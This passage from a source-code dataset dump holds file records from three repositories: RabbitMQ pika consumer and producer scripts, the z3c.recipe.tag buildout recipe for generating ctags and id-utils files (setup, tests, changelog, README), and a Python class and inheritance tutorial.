"text": "import pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='pub-sub', exchange_type='fanout')\n\nresult = channel.queue_declare(exclusive=True)\nqueue_name = result.method.queue\n\nchannel.queue_bind(exchange='pub-sub', queue=queue_name)\n\n\ndef callback(ch, method, properties, body):\n print(body)\n\n\ntry:\n print('Consuming...')\n\n channel.basic_consume(callback, queue=queue_name, no_ack=True)\n channel.start_consuming()\n\nexcept:\n connection.close()\n"
},
{
"alpha_fraction": 0.7080459594726562,
"alphanum_fraction": 0.7080459594726562,
"avg_line_length": 19.714284896850586,
"blob_id": "bb16eb51980f8b06ab8c67c39f9c595edd5b9e30",
"content_id": "7b3cfed52d27d9b3e997aeb9bf30fdbe8e6e88f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 21,
"path": "/fridge/consumer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='task-queue', durable=True)\n\n\ndef callback(ch, method, properties, body):\n print('Consumed... {}'.format(body))\n\n\ntry:\n print('Consuming...')\n\n channel.basic_consume(callback, queue='task-queue', no_ack=True)\n channel.start_consuming()\n\nexcept:\n connection.close()\n"
},
{
"alpha_fraction": 0.5568720102310181,
"alphanum_fraction": 0.5604265332221985,
"avg_line_length": 29.14285659790039,
"blob_id": "25df04e64e0de6b5dc13aa4b940f264989b46d2d",
"content_id": "84838ebaa390430dee5eab1d88ac224c6f6a049e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 844,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 28,
"path": "/fridge/producer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\nimport time\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='task-queue', durable=True)\n\nfoods = ['candy', 'orange', 'apple', 'tomato', 'banana', 'rice', 'chicken', 'beef', 'pork', 'pork chop', 'snickers', 'soda', 'sprite', 'dr. pepper', 'bread', 'rolls', 'doritos', 'cheetos', 'tea', 'lemonade', 'gum', 'pepsi', 'coke', 'ice cream', 'mint gum']\ntry:\n counter = 0\n\n while True:\n for food in foods:\n message = food\n\n channel.basic_publish(exchange='',\n routing_key='task-queue',\n body=message)\n\n print('I put {} on the counter'.format(food))\n\n time.sleep(1)\n counter += 1\n\nexcept:\n connection.close()\n"
}
] | 5 |
zopefoundation/z3c.recipe.tag
|
https://github.com/zopefoundation/z3c.recipe.tag
|
ef1b766909e1d8808455267abc1405e5f4c9102f
|
c278ac2a3411a8357ca2462ac50b516c7e37e042
|
1500ffcd0b6f2aa1f6a6d0b16c27694670d02c62
|
refs/heads/master
| 2023-09-01T08:06:46.049111 | 2023-02-09T07:29:21 | 2023-02-09T07:29:21 | 8,905,788 | 0 | 0 |
NOASSERTION
| 2013-03-20T14:14:10 | 2022-09-16T09:03:53 | 2023-02-08T14:49:35 |
Python
|
[
{
"alpha_fraction": 0.5593220591545105,
"alphanum_fraction": 0.5718644261360168,
"avg_line_length": 32.90804672241211,
"blob_id": "47a2643c1926d2fa26a78dd8e0ba9a34533fdb3d",
"content_id": "d60f463cb8018eb0bd0ccb368f6b449f9e1c806d",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 87,
"path": "/setup.py",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Setup for z3c.recipe.tag\"\"\"\n\nimport os\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\n\ndef read(*rnames):\n with open(os.path.join(os.path.dirname(__file__), *rnames)) as f:\n return f.read()\n\n\nsetup(\n name=\"z3c.recipe.tag\",\n version='1.0.1.dev0',\n author=\"Ignas Mikalajūnas and the Zope Community\",\n description=\"Generate ctags from eggs for development.\",\n long_description=read('README.rst') + '\\n\\n' + read('CHANGES.rst'),\n license=\"ZPL 2.1\",\n maintainer=\"Paul Carduner\",\n maintainer_email=\"[email protected]\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Zope Public License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Framework :: Buildout\",\n \"Topic :: Software Development :: Build Tools\",\n \"Topic :: Text Editors :: Emacs\",\n \"Topic :: Utilities\",\n ],\n url='https://github.com/zopefoundation/z3c.recipe.tag',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['z3c', 'z3c.recipe'],\n python_requires='>=3.7',\n extras_require=dict(\n test=[\n 'zope.testing',\n 'zope.testrunner',\n ],\n ),\n install_requires=[\n 'setuptools',\n 'zc.buildout >= 3.0',\n 'zc.recipe.egg',\n # these two come from apt-get:\n # 'id-utils',\n # 'ctags-exuberant'\n # alternately, on Mac, use macports (macports.org) and\n # ``sudo port install ctags idutils``\n ],\n entry_points={\n 'zc.buildout': [\n 'default = z3c.recipe.tag:TagsMaker',\n 'tags = z3c.recipe.tag:TagsMaker',\n ],\n 'console_scripts': [\n 'build_tags = z3c.recipe.tag:build_tags',\n ],\n },\n zip_safe=False,\n include_package_data=True,\n)\n"
},
{
"alpha_fraction": 0.5565217137336731,
"alphanum_fraction": 0.5649175643920898,
"avg_line_length": 30.761905670166016,
"blob_id": "a3880ff79b53521533dd3a9f3044e7e9024170b4",
"content_id": "9de87bb406a0e0a6949fa9779f99fae8e832fcab",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3335,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 105,
"path": "/src/z3c/recipe/tag/tests.py",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "import doctest\nimport os\nimport re\nimport unittest\n\nimport zc.buildout.testing\nfrom zope.testing import renormalizing\n\n\ndef doctest_tags_recipe():\n \"\"\"Test for z3c.recipe.tag\n\n >>> write('buildout.cfg',\n ... '''\n ... [buildout]\n ... parts = tags\n ...\n ... [tags]\n ... recipe = z3c.recipe.tag\n ... eggs =\n ... z3c.recipe.tag\n ... ''')\n\n >>> print(system(join('bin', 'buildout')).rstrip())\n Installing tags.\n Generated script '/sample-buildout/bin/tags'.\n\n >>> cat('bin', 'tags')\n #!/usr/bin/python\n <BLANKLINE>\n import sys\n sys.path[0:0] = [\n '/z3c.recipe.tag/src',\n ]\n <BLANKLINE>\n import os\n sys.argv[0] = os.path.abspath(sys.argv[0])\n os.chdir('.../_TEST_/sample-buildout')\n <BLANKLINE>\n <BLANKLINE>\n import z3c.recipe.tag\n <BLANKLINE>\n if __name__ == '__main__':\n sys.exit(z3c.recipe.tag.build_tags())\n\n \"\"\"\n\n\ndef setUp(test):\n zc.buildout.testing.buildoutSetUp(test)\n zc.buildout.testing.install('zc.recipe.egg', test)\n zc.buildout.testing.install_develop('z3c.recipe.tag', test)\n\n\ndef tearDown(test):\n zc.buildout.testing.buildoutTearDown(test)\n\n\nchecker = renormalizing.RENormalizing([\n zc.buildout.testing.normalize_path,\n # zope.whatever-1.2.3-py3.7.egg -> zope.whatever-pyN.N.egg\n (re.compile(r'-[^ /]+-py\\d[.]\\d(-\\S+)?.egg'), '-pyN.N.egg'),\n # #!/path/to/whatever/python3.2mu -> #!/usr/bin/python\n (re.compile('#![^\\n]+/python[0-9.mu]*'), '#!/usr/bin/python'),\n # location of this source tree\n (re.compile(\"\"\"['\"][^\\n\"']+z3c.recipe.tag[^\\n\"']*['\"],\"\"\"),\n \"'/z3c.recipe.tag/src',\"),\n # I've no idea what causes these\n # Couldn't find index page for 'zc.recipe.egg' (maybe misspelled?)\n # error messages, let's just suppress them\n (re.compile(\"Couldn't find index page for '[a-zA-Z0-9.]+' \"\n r\"\\(maybe misspelled\\?\\)\\n\"), ''),\n # I've no idea what causes these\n # Not found: /tmp/tmpJKH0LKbuildouttests/zc.buildout/\n # error messages, let's just suppress them\n (re.compile(\"Not found: .*buildouttests/[a-zA-Z0-9.]+/\\n\"), ''),\n])\n\nif os.getenv('RUNNING_UNDER_TOX'): # pragma: no cover\n # tox installs our test dependencies into the virtualenv,\n # and zc.buildout has no site isolation, so it finds them there,\n # so it doesn't add them to sys.path in the generated scripts\n checker += renormalizing.RENormalizing([\n (re.compile(r\"\\s*'/sample-buildout/eggs/zc.recipe.egg-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"\\s*'/sample-buildout/eggs/zc.buildout-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"\\s*'/sample-buildout/eggs/distribute-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"\\s*'/sample-buildout/eggs/setuptools-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"'.*/site-packages'\"), \"'/z3c.recipe.tag/src'\"),\n (re.compile(r\"#!/.*/bin/pypy.*\"), \"#!/usr/bin/python\"),\n ])\n\n\ndef test_suite():\n return unittest.TestSuite([\n doctest.DocTestSuite(\n setUp=setUp, tearDown=tearDown, checker=checker,\n optionflags=(\n doctest.NORMALIZE_WHITESPACE\n | doctest.ELLIPSIS\n | doctest.REPORT_NDIFF)),\n ])\n"
},
{
"alpha_fraction": 0.5739673376083374,
"alphanum_fraction": 0.6378481984138489,
"avg_line_length": 20.030303955078125,
"blob_id": "e026fdf4449fd5971887264ef60333322d791ec4",
"content_id": "782effdb4e6f763632be193173ae75b72062e359",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2082,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 99,
"path": "/CHANGES.rst",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "=======\nCHANGES\n=======\n\n1.0.1 (unreleased)\n------------------\n\n- Nothing changed yet.\n\n\n1.0 (2023-02-09)\n----------------\n\n- Drop support for Python < 3.7.\n\n- Add support for Python 3.7 up to 3.11.\n\n- Require ``zc.buildout >= 3``.\n\n\n0.8 (2014-10-20)\n----------------\n\n- Add --tag-relative option to support relative tag generation.\n\n\n0.7 (2013-03-22)\n----------------\n\n- Support and require zc.buildout 2.0.\n\n- Add supported Python version (3.6, 2.7, 3.2, 3.3) classifiers to\n setup.py\n\n\n0.6 (2012-09-07)\n----------------\n\n- Update manifest to allow package generation fron non-VCS export. Counters the\n 0.5 \"brown bag\" release.\n\n\n0.5 (2012-09-06)\n----------------\n\n- Exclude Python import statements by default from showing up as tags.\n\n- Add 'defaults' option to allow adding default command line options (e.g. to\n set '-v' by default)\n\n\n0.4.1 (2012-01-11)\n------------------\n\n* Skip nonexistent sys.path directories to avoid ctags warnings.\n\n\n0.4.0 (2010-08-29)\n------------------\n\n* Support new script features from zc.buildout 1.5 and higher. This version\n requires zc.buildout 1.5 or higher.\n\n* Also index Mako and HTML files with id-utils.\n\n\n0.3.0 (2009-08-16)\n------------------\n\n* Add support for using this recipe as a `paver <http://www.blueskyonmars.com/projects/paver/>`_ task.\n\n* Also index Javascript, CSS and ReStructuredText files with id-utils.\n\n* Define a default entry point for zc.buildout, so you can simply say::\n\n [ctags]\n recipe = z3c.recipe.tag\n\n\n0.2.0 (2008-08-28)\n------------------\n\n* Allow command-line choices for what files to build, and what languages ctags\n should parse. (Note that the default behavior of running ``./bin/tags``\n is the same as previous releases.)\n\n* Support the Mac OS X packaging system \"macports\" (exuberant ctags is\n ``ctags-exuberant`` in Ubuntu and ``ctags`` in macports).\n\n* Support creating BBEdit-style ctags files.\n\n* Small changes for development (use bootstrap external, set svn:ignore)\n\n0.1.0 (2008-03-16)\n------------------\n\n- Initial release.\n\n * buildout recipe for generating ctags of eggs used.\n"
},
{
"alpha_fraction": 0.5403017997741699,
"alphanum_fraction": 0.5443503856658936,
"avg_line_length": 34.28571319580078,
"blob_id": "d3fcc1c6e03092c196a32f624b0176eef3ccd5fa",
"content_id": "9e02da20bd56779aaa941010d57f9639f2fbec84",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8151,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 231,
"path": "/src/z3c/recipe/tag/__init__.py",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\nimport optparse\nimport os\nimport subprocess\nimport sys\n\nimport pkg_resources\n\nimport zc.buildout.easy_install\nimport zc.recipe.egg\n\n\nclass TagsMaker:\n\n def __init__(self, buildout, name, options):\n self.buildout = buildout\n self.name = name\n self.options = options\n # We do this early so the \"extends\" functionality works before we get\n # to the other options below.\n self._delegated = zc.recipe.egg.Egg(buildout, name, options)\n options['script'] = os.path.join(buildout['buildout']['bin-directory'],\n options.get('script', self.name),\n )\n if not options.get('working-directory', ''):\n options['location'] = os.path.join(\n buildout['buildout']['parts-directory'], name)\n\n def install(self):\n options = self.options\n generated = []\n eggs, ws = self._delegated.working_set(('z3c.recipe.tag',))\n\n wd = options.get('working-directory', '')\n if not wd:\n wd = options['location']\n if os.path.exists(wd):\n assert os.path.isdir(wd)\n else:\n os.mkdir(wd)\n generated.append(wd)\n\n initialization = initialization_template % (\n self.buildout['buildout']['directory'])\n\n env_section = options.get('environment', '').strip()\n if env_section:\n env = self.buildout[env_section]\n for key, value in env.items():\n initialization += env_template % (key, value)\n\n initialization_section = options.get('initialization', '').strip()\n if initialization_section:\n initialization += initialization_section\n\n arguments = options.get('defaults', '')\n if arguments:\n arguments = arguments + ' + sys.argv[1:]'\n\n generated.extend(zc.buildout.easy_install.scripts(\n [(options['script'], 'z3c.recipe.tag', 'build_tags')],\n ws, options['executable'],\n self.buildout['buildout']['bin-directory'],\n extra_paths=self._delegated.extra_paths,\n initialization=initialization,\n ))\n\n return generated\n\n update = install\n\n\ninitialization_template = \"\"\"import os\nsys.argv[0] = os.path.abspath(sys.argv[0])\nos.chdir(%r)\n\"\"\"\n\nenv_template = \"\"\"os.environ['%s'] = %r\n\"\"\"\n\n\ndef getpath(candidates):\n paths = os.environ['PATH'].split(os.pathsep)\n for c in candidates:\n for p in paths:\n full = os.path.join(p, c)\n if os.path.exists(full):\n return full\n raise RuntimeError(\n 'Can\\'t find executable for any of: %s' % candidates)\n\n\nclass Builder:\n def get_relpaths(self, paths):\n working_dir = os.getcwd()\n return [os.path.relpath(path, working_dir) for path in paths]\n\n def __call__(self, targets=None, languages=None, tag_relative=False):\n if not targets:\n targets = ('idutils', 'ctags_vi', 'ctags_emacs') # legacy behavior\n self.languages = languages or ''\n self.tag_relative = tag_relative\n paths = [path for path in sys.path\n if os.path.isdir(path)]\n if self.tag_relative:\n # ctags will ignore --tag-relative=yes for absolute paths so we\n # must pass relative paths to it.\n paths = self.get_relpaths(paths)\n self.paths = paths\n results = {}\n for target in targets:\n tool_candidates, arguments, source, destination = getattr(\n self, '_build_{}'.format(target))()\n arguments[0:0] = [getpath(tool_candidates)]\n res = subprocess.call(arguments)\n if res == 0:\n res = subprocess.call(['mv', source, destination])\n results[target] = res\n return results\n\n def _build_idutils(self):\n return [\n [\n 'mkid'\n ], [\n '-m',\n pkg_resources.resource_filename(\n \"z3c.recipe.tag\", \"id-lang.map.txt\"),\n '-o',\n 'ID.new'\n ] + self.paths,\n 'ID.new',\n 'ID']\n\n def _build_ctags_vi(self):\n res = [['ctags-exuberant', 'ctags'],\n ['-R',\n '--python-kinds=-i',\n '-f',\n 'tags.new'] + self.paths,\n 'tags.new',\n 'tags']\n if self.languages:\n res[1][0:0] = ['--languages=%s' % self.languages]\n if self.tag_relative:\n res[1][0:0] = ['--tag-relative=yes']\n return res\n\n def _build_ctags_emacs(self):\n res = self._build_ctags_vi()\n res[1][0:0] = ['-e']\n res[3] = 'TAGS'\n return res\n\n def _build_ctags_bbedit(self):\n res = self._build_ctags_vi()\n try:\n res[1].remove('--tag-relative=yes')\n except ValueError:\n pass\n res[1][0:0] = [\n '--excmd=number', '--tag-relative=no', '--fields=+a+m+n+S']\n return res\n\n\ndef append_const(option, opt_str, value, parser, const):\n # 'append_const' action added in Py 2.5, and we're in 2.4 :-(\n if getattr(parser.values, 'targets', None) is None:\n parser.values.targets = []\n parser.values.targets.append(const)\n\n\ndef build_tags(args=None):\n parser = optparse.OptionParser()\n parser.add_option('-l', '--languages', dest='languages',\n default='-JavaScript',\n help='ctags comma-separated list of languages. '\n 'defaults to ``-JavaScript``')\n parser.add_option('-e', '--ctags-emacs', action='callback',\n callback=append_const, callback_args=('ctags_emacs',),\n help='flag to build emacs ctags ``TAGS`` file')\n parser.add_option('-v', '--ctags-vi', action='callback',\n callback=append_const, callback_args=('ctags_vi',),\n help='flag to build vi ctags ``tags`` file')\n parser.add_option('-b', '--ctags-bbedit', action='callback',\n callback=append_const, callback_args=('ctags_bbedit',),\n help='flag to build bbedit ctags ``tags`` file')\n parser.add_option('-i', '--idutils', action='callback',\n callback=append_const, callback_args=('idutils',),\n help='flag to build idutils ``ID`` file')\n parser.add_option('-r', '--tag-relative', action='store_true',\n dest='tag_relative', default=False,\n help=('generate tags with paths relative to'\n ' tags file instead of absolute paths'\n ' (works with vim tags only)'))\n options, args = parser.parse_args(args)\n if args:\n parser.error('no arguments accepted')\n targets = getattr(options, 'targets', None)\n if (targets and 'ctags_bbedit' in targets and 'ctags_vi' in targets):\n parser.error('cannot build both vi and bbedit ctags files (same name)')\n builder = Builder()\n builder(targets, languages=options.languages,\n tag_relative=options.tag_relative)\n\n\ntry:\n import paver.easy\nexcept ImportError:\n HAS_PAVER = False\nelse: # pragma: nocover\n HAS_PAVER = True\n\nif HAS_PAVER: # pragma: nocover\n @paver.easy.task\n @paver.easy.consume_args\n def tags(args):\n \"\"\"Build tags database file for emacs, vim, or bbedit\"\"\"\n build_tags(args)\n"
},
{
"alpha_fraction": 0.6839565634727478,
"alphanum_fraction": 0.6880578994750977,
"avg_line_length": 29.477941513061523,
"blob_id": "ba0cdff92d53ab868cda28a3e2749540a8ca741f",
"content_id": "cbdcd32eb03e64204e4f5d9265343ab52bc89635",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4145,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 136,
"path": "/README.rst",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "==============\nz3c.recipe.tag\n==============\n\n|buildstatus|_\n\n.. contents::\n\nIntroduction\n------------\n\nThis recipe generates a TAGS database file that can be used with a\nnumber of different editors to quickly look up class and function\ndefinitions in your package's source files and egg dependencies.\n\nDependencies\n------------\n\nBefore running a tags enabled buildout, you must install the\nappropriate command line tag generation tools: exuberant-ctags and\nid-utils. In Ubuntu, you can install these with apt-get::\n\n $ sudo apt-get install exuberant-ctags id-utils\n\nOn a Mac, download and install ``port`` from http://www.macports.org/ and then\ninstall ctags and idutils in this way::\n\n $ sudo port install ctags idutils\n\nHow to use this recipe\n----------------------\n\nWith Buildout\n.............\n\nSuppose you have an egg called ``MyApplication``. To use this recipe with\nbuildout, you would add the following to the ``buildout.cfg`` file::\n\n [tags]\n recipe = z3c.recipe.tag\n eggs = MyApplication\n\nThis produces a script file in the ``bin/`` directory which you can\nthen run like this::\n\n $ ./bin/tags\n\nBy default, this script produces three files in the directory from\nwhich you ran the script:\n\n- a ctags file called ``TAGS`` for use by emacs,\n- a ctags file called ``tags`` for use by vi, and\n- an idutils file called ``ID`` for use by id-utils (gid, lid).\n\nYou can then use these files in your editor of choice.\n\nOptionally, you can select which files to build. The following is the output\nof ``./bin/tags --help``::\n\n usage: build_tags [options]\n\n options:\n -h, --help show this help message and exit\n -l LANGUAGES, --languages=LANGUAGES\n ctags comma-separated list of languages. defaults to\n ``-JavaScript``\n -e, --ctags-emacs flag to build emacs ctags ``TAGS`` file\n -v, --ctags-vi flag to build vi ctags ``tags`` file\n -b, --ctags-bbedit flag to build bbedit ctags ``tags`` file\n -i, --idutils flag to build idutils ``ID`` file\n\nIf you'd like to set command line options by default (e.g. to limit\nbuilding to ctags-vi by default) you can pass the ``default`` option in\nyour buildout.cfg::\n\n [tags]\n recipe = z3c.recipe.tag\n eggs = MyApplication\n default = ['-v']\n\nWith virtualenv\n...............\n\nYou can use this with `virtualenv\n<https://pypi.python.org/pypi/virtualenv>`__ too::\n\n my_venv/bin/pip install z3c.recipe.tag\n my_venv/bin/build_tags\n\nthis will build a tags file for all the packages installed in that virtualenv.\n\nWith Paver\n..........\n\nIf you are using `Paver\n<http://www.blueskyonmars.com/projects/paver/>`_ and already have\nz3c.recipe.tag installed, then all you have to do is add this line to\nyour ``pavement.py`` file::\n\n import z3c.recipe.tag\n\nAnd then run the ``z3c.recipe.tag.tags`` task from the command line::\n\n $ paver z3c.recipe.tag.tags\n\nAdditional Resources\n--------------------\n\nFor additional information on using tags tables with different editors\nsee the following websites:\n\n- **Emacs**: http://www.gnu.org/software/emacs/manual/html_node/emacs/Tags.html\n\n - to jump to the location of a tag, type ``M-x find-tag`` and the\n name of the tag. Or use ``M-.`` to jump to the tag matching the token\n the cursor is currently on. The first time you do this, you will\n be prompted for the location of the TAGS file.\n\n- **VIM**: http://vimdoc.sourceforge.net/htmldoc/tagsrch.html\n\n- **BBEdit**: http://pine.barebones.com/manual/BBEdit_9_User_Manual.pdf\n Chapter 14, page 324\n\nFor more information on ctags, visit http://ctags.sourceforge.net/\n\n(BBEdit_ is a Macintosh text editor.)\n\n.. _BBEdit: http://barebones.com/products/bbedit/\n\nFor more information about GNU id-utils (basically a local text\nindexing/search engine; think of it as a very fast version of ``grep\n-w``), see the `id-utils manual\n<http://www.gnu.org/software/idutils/manual/idutils.html>`__.\n\n.. |buildstatus| image:: https://github.com/zopefoundation/z3c.recipe.tag/workflows/tests/badge.svg\n.. _buildstatus: https://github.com/zopefoundation/z3c.recipe.tag/actions?query=workflow%3Atests\n"
}
] | 5 |
lalet/Test
|
https://github.com/lalet/Test
|
7d4c8a81be25db5e0858fdd12f032e729d0db3f1
|
01a72338c994a0d582e7465cb53c6cc83b0d8d4c
|
6a741c90ff42b0f6ff69512aaa056b424561a572
|
refs/heads/master
| 2016-08-07T05:41:32.948385 | 2015-03-08T16:34:27 | 2015-03-08T16:34:27 | 31,856,665 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5837320685386658,
"alphanum_fraction": 0.6507176756858826,
"avg_line_length": 26.66666603088379,
"blob_id": "072d315532aa1b78e4ad0d710d0167819e072753",
"content_id": "3c1b2990dc948f9c53b092d53c6e94fd1aed9f54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 15,
"path": "/locu.py",
"repo_name": "lalet/Test",
"src_encoding": "UTF-8",
"text": "import urllib2\nimport json\n\nlocu_api = '2e09f433bee28825bbcdae393e3e4168e1851da9'\n\ndef locu_search(query):\n api_key = locu_api\n url = 'https://api.locu.com/v1_0/venue/search/?api_key=' + api_key\n locality = query\n final_url = url + \"&locality=\" + locality\n json_obj = urllib2.urlopen(final_url)\n data = json.load(json_obj)\n\n for item in data['objects']:\n print \"item is:\" + item['name']\n\n\n\n"
}
] | 1 |
flyingbest/head-first-python
|
https://github.com/flyingbest/head-first-python
|
ff507027cb3a5e19de33a184c8f9e8aa03fd41e6
|
b5df6854c93f5afc75395383daca23bb175359b0
|
b0f239b25f055bd8964a2b2aabb79530380f63b6
|
refs/heads/master
| 2021-01-20T05:40:01.526335 | 2017-03-13T05:16:39 | 2017-03-13T05:16:39 | 83,861,417 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6313065886497498,
"alphanum_fraction": 0.6442431807518005,
"avg_line_length": 18.982759475708008,
"blob_id": "7a3717e481bb9314bc9c9dbb4d64f06df7f2b2f4",
"content_id": "c9518509804d6bd147d673d7da0309ce0e624ba9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2319,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 116,
"path": "/tutorial/class.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Class\nclass Student:\n\tname = 'ansxodbs'\n\tdef info(self):\n\t\tprint(\"My name is \" + self.name + \". \")\n\ninst = Student()\n\nprint(type(inst))\nprint(inst.name)\ninst.info()\n\nclass Book:\n\t# Constructor\n\tdef __init__(self, BookName):\n\t\tself.name = BookName\n\t\tprint(\"object is constructed. The book name is \" + self.name + \". \")\n\t# Destructor\n\tdef __del__(self):\n\t\tprint(\"object \" + self.name + \" is destructed.\")\n\nobjectBook = Book('Python3 programming')\ndel objectBook\n\n\n# Inheritance\nclass Person:\n\tdef __init__(self, name, age, gender):\n\t\tself.Name = name\n\t\tself.Age = age\n\t\tself.Gender = gender\n\tdef printInfo(self):\n\t\tprint(\"My name is \" + self.Name + \". I am \" + str(self.Age) + \" years old.\")\n\nclass Employee(Person):\n\tdef __init__(self, name, age, gender, salary, hiredate):\n\t\tPerson.__init__(self, name, age, gender)\n\t\tself.Salary = salary\n\t\tself.Hiredate = hiredate\n\tdef doWork(self):\n\t\tprint(\"I'm working hard!\")\n\tdef printInfo(self):\n\t\tPerson.printInfo(self)\n\t\tprint(\"My salary is \" + str(self.Salary) + \" dollars. And My hiredate is \" + self.Hiredate + \".\")\n\nobjectEmployee = Employee(\"ansxodbs\", 20, \"man\", 50000000, \"04-05-2017\")\nobjectEmployee.doWork()\nobjectEmployee.printInfo()\n\n\n# Multiple Inheritance\nclass ParentOne:\n\tdef func(self):\n\t\tprint(\"call func of ParentOne!\")\n\nclass ParentTwo:\n\tdef func(self):\n\t\tprint(\"call func of ParentTwo!\")\n\nclass Child(ParentOne, ParentTwo):\n\tdef childFunc(self):\n\t\tParentOne.func(self)\n\t\tParentTwo.func(self)\n\t\tprint(\"call func of child!\")\n\nobjectChild = Child()\nobjectChild.childFunc()\nprint()\nobjectChild.func()\nprint()\n\nclass A:\n\tdef __init__(self):\n\t\tprint(\"call constructor of A class\")\n\nclass B(A):\n\tdef __init__(self):\n\t\t#A.__init__(self)\n\t\tsuper().__init__()\n\t\tprint(\"call constructor of B class\")\n\nclass C(A):\n\tdef __init__(self):\n\t\t#A.__init__(self)\n\t\tsuper().__init__()\n\t\tprint(\"call constructor of C class\")\n\nclass D(B, C):\n\tdef __init__(self):\n\t\t#B.__init__(self)\n\t\t#C.__init__(self)\n\t\tsuper().__init__()\n\t\tprint(\"call constructor of D class\")\n\nobjectD = D()\n\n\n# Operator Overloading\nclass Numbox:\n\tdef __init__(self, num):\n\t\tself.Num = num\n\tdef __add__(self, num):\n\t\tself.Num += num\n\tdef __radd__(self, num):\n\t\tself.Num += num\n\tdef __sub__(self, num):\n\t\tself.Num -= num\n\nn = Numbox(50)\nn + 100\nprint(n.Num)\n100 + n\nprint(n.Num)\nn - 110\nprint(n.Num)\nprint()\n\n"
},
{
"alpha_fraction": 0.6775495409965515,
"alphanum_fraction": 0.6793836951255798,
"avg_line_length": 36.84722137451172,
"blob_id": "9868bef3717720a0e49839c6e387a99e6cb502e6",
"content_id": "73fd71968f46962161b02318f45856f486a3e0aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2826,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 72,
"path": "/tutorial/getopt_test.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
